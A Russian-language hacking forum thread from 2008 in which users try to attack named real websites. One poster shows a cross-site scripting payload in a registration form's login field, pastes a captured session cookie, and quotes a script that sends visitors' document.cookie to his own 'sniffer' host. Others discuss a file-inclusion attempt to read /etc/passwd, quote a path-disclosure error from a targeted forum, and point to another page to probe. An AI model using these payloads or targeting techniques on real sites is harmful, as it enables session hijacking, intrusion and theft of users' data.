сайт.ру/reg/
форма регистрации, в поле логин <script>alert(document.cookie)</script> в поле пароль 123, подтверждение пароля 123, выскакивает алерт с куками PHPSESSID=ac84f8bec0d0771323b85b0fe22c8812; 143b1a11a2512f8f5c6cfee8402ead19=-; mosvisitor=1, если вписать <script>img = new Image(); img.src = "http://мой_сниффер.gif?"+document.cookie;</script> то ничо не происходит и на сниффер ничо не приходит...чо сделать? чо курить?
Последний раз редактировалось Витян; 07.02.2008 в 03:15..
сайт.ру/reg/
форма регистрации, в поле логин <script>alert(document.cookie)</script> в поле пароль 123, подтверждение пароля 123, выскакивает алерт с куками PHPSESSID=ac84f8bec0d0771323b85b0fe22c8812; 143b1a11a2512f8f5c6cfee8402ead19=-; mosvisitor=1, если вписать <script>img = new Image(); img.src = "http://мой_сниффер.gif?"+document.cookie;</script> то ничо не происходит и на сниффер ничо не приходит...чо сделать? чо курить?
а тебе не приходила мысль, что, что бы поймать куки нужно, что бы кто-то другой данную операцию совершил =/
/etc/passwd не выводит ... а такой инклуд да я первый раз вижу ... я по скулю лучше
И не выведет, ибо SAFE MODE. Remote include тем более не прокатит, ибо настройки не позволяют. Можно инклудить лишь файлы того сайта+раскрытие директории
Warning: include(cash/4.dat) [function.include]: failed to open stream: No such file or directory in /home/us1958/horse.ru/www/forum/include/footer.php on line 74
If you beleive that this error is due to the server configuration problems please contact your local web-hosting support team.
Ммм... Сейчас попробую помучиться сама, вот насколько это перспективно?
http://www.horse.ru/forum/search.php?f=4
Но на сайте таких - завалиться..